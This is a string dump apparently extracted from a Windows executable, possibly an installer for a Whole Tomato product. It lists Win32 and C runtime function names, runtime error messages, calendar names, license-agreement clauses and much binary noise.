InterlockedDecrement
InterlockedIncrement
IsDebuggerPresent
IsValidCodePage
.:;;;;ITf
;iUg~}@
j|7RKb
J{8KNn
JanFebMarAprMayJunJulAugSepOctNovDec
January
j@j ^V
*jLggl+
JS|l77
jyG)N9
-k1A3K
k7/4/;PT
K]`cY^
$Ke9fM
KERNEL32.dll
Kl~gq<
$KM|xC
(K-p% 
-kUK0|z1LQ
KW#c	lQ
/}]L")
L5'?)"""#
L5'%""#"$
Last modified: May
LCMapStringA
LCMapStringW
LeaveCriticalSection
LIMITATION OF LIABILITY. You assume the entire risk as to the quality and performance of the Software. Whole Tomato assumes no liability for the cost of any service or repair if the Software is defective 
lllkkkjj/bbQQTV
LoadIconW
LoadLibraryA
LoadStringW
LRI?9\
lstrcmpiA
lxsC0*
&l;Zq2
m\.1,,,,,2TW
MessageBoxA
Microsoft Visual C++ Runtime Library
M-iiU9
mIODGysC
mmdBEO]_
MM/dd/yy
MMM3MMM
MMM7MMM
MMM9MMMxMMM
MMMAMMMNMMMKMMMFMMM@MMM7MMM,MMM!MMM
MMMBMMM
MMMdMMM"MMM
MMMdMMM(MMM
MMMFMMM
MMMJMMM
MMMjMMM>MMM*MMM
MMMjMMMXMMMLMMMAMMM4MMM%MMM
MMMkMMMXMMMLMMMBMMM2MMM
MMMlMMM'MMM
MMM^MMM
MMM=MMM
MMM:MMM
MMM?MMM
MMM	MMM
MMM|MMM4MMM
MMMmMMM'MMM
MMMnMMM(MMM
MMMQMMM
MMMrMMMaMMMQMMMDMMM9MMM,MMM
MMMrMMMKMMM
MMMrMMM`MMMRMMMFMMM:MMM.MMM"MMM
MMMSMMM
MMMsMMM+MMM	MMM
MMMtMMM+MMM	MMM
MMMWMMM
MMMYMMM
MMMyMMMfMMMVMMMKMMM@MMM2MMM%MMM
MMMyMMM/MMM
MMMzMMMKMMM
Monday
(>MS|qM
msvcrt.dll
MultiByteToWideChar
nLLLLZk7/5--Pb
n]}])&N
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
nuk{safe4.
n~~~~~~~~v
n~~~~~~~~~~~~v
nv`U[2_,m>
n~~~~~~~~~~~~w`
n~~~~~~~~~~~~w`w
nwwwwwwww`ww
n~~~~~~~~~~~~w`x
NZOoNybi
<O*7e;2v
oaaaa_ep
October
OFFEEEDDDD.111111RU
 OGu00
O)kunm
o"}y3j
#P7uyf
pjSBJy
Please contact the application's support team for more information.
pn~~~~
pO5TEd3q%
~~~p~p
PPPPPPPP
pr"0/o6
Program: 
<program name unknown>
P&^ru}N
P'^su|N
- pure virtual function call
pw	C4L	
/QGGGRT
/Q@hk`W
QueryPerformanceCounter
QZRyVN
R'387|L
RCJ$TY
`.rdata
rGlSW\|
rhGffN
rK%D{d_k
r?`N$~
Ro```]]
&roLCIL
`r+Qa-
R'^sw|,
R'\sw|
R'_sw|E
R'\sw|L
R'\sw|M
RtlUnwind
runtime error 
Runtime Error!
R'Usw|@
/}RW\_j_
rX+%"/
rxFaEp
R'Ysv|L
rZ8oWFFWwwvvC:QQQRa'
}S58rm
|'|s>|8
Saturday
September
SetHandleCount
SetLastError
SetUnhandledExceptionFilter
SING error
=SOFTu
SOFTWARE LICENSE AGREEMENT
Sunday
SunMonTueWedThuFriSat
S>wyMqB
sYR|nyywwx
sYU~pI
\t]c|n
TerminateProcess
TERMINATION. Whole Tomato may, at its sole discretion, terminate this Agreement, the license granted herein, and your right to use or access the Software at any time. On termination, you must destroy all copies of the Software. 
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
< tK<	tG
TLOSS error
tLP0Zn>l
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
TLvtuM
tnnTTi
toobRTi
,(TR'3
t"SS9]
t_'\sw%
^}}|tt
t$<"u	3
Tuesday
;t$,v-
t+WWVPV
|tyg,1
t<ZTRyN$
*ubaxn
+[ujk-n
- unable to initialize heap
- unable to open console device
U`ncS	qz^
UNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, TORT, CONTRACT, STRICT LIABILITY, OR OTHERWISE, SHALL WHOLE TOMATO OR ITS LICENSORS, SUPPLIERS OR RESELLERS BE LIABLE TO YOU OR ANY OTHER PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES FOR LOST PROFITS, LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY AND ALL OTHER COMMERCIAL DAMAGES OR LOSSES. IN NO EVENT WILL WHOLE TOMATO BE LIABLE FOR ANY DAMAGES IN EXCESS OF WHOLE TOMATO'S LIST PRICE FOR A LICENSE TO THE SOFTWARE, EVEN IF WHOLE TOMATO SHALL HAVE BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES, OR FOR ANY CLAIM BY ANY OTHER PARTY. THIS LIMITATION OF LIABILITY SHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION. FURTHERMORE, SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS LIMITATION AND EXCLUSION MAY NOT APPLY TO YOU. 
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
uOwve,
UQPXY]Y[
URPQQh@W@
USER32.dll
USER32.DLL
UTlZMSK
uuu4nncTK
~~~~~~~~~~~~v
v0TTR[
V%blSa
VBNetStudio
~vfffffff~~~v
VirtualAlloc
VirtualFree
V]/JtE
vlCG&tm
V`mdRQJ"& 
 VNbem^
v	N+D$
vw	C?L
~~~~~~~w`
@`w?< 
[W5cgl
[|w.8=
w/Adzi
WbBcy*$
Wc6c@U
w|CGLq
Wednesday
WFFFFW,)---<^
w,\ "g
WG1<9\?
"WGcglT
"W$gfl\(w
WideCharToMultiByte
wlCgl\
wlCGL|
wlCGL}
"wLCgL\
"WlCGL|
"WLcgl
"WLcgl]
"WLcgl\
wlCGLl
WL|ch|
/wLC)L
Wlc&l(
"WLcw|L
 WNcel^
WoVZZU
%%W@p:a
w,)-**>R
WriteFile
w|SW\N
W<S?Xm
w+;Twx
~~~~~~~w`w
wwwwwwwww
wwwwwwwwww
W!YvqyI
^WYzX0
#Xa]a<
XL\[FGE
xlllkkkjj
XRG???
X'\sw|b
Y3+)"""#
Y6UyeuJ
/Y%aFS
Y.dZ]~
YEmnxU
YRIPPPF
>=Yt1j
yxuB^o
~~||{yy4naTV
||{yywuuuuu4oooTV
{yywwu
ziNBBz
ZJQ']h
zlCGL%
z>]N?@5
z_____/VK<-
ZZZNN/HHHHJTW
][[[ZZZNNOO/HH::;UU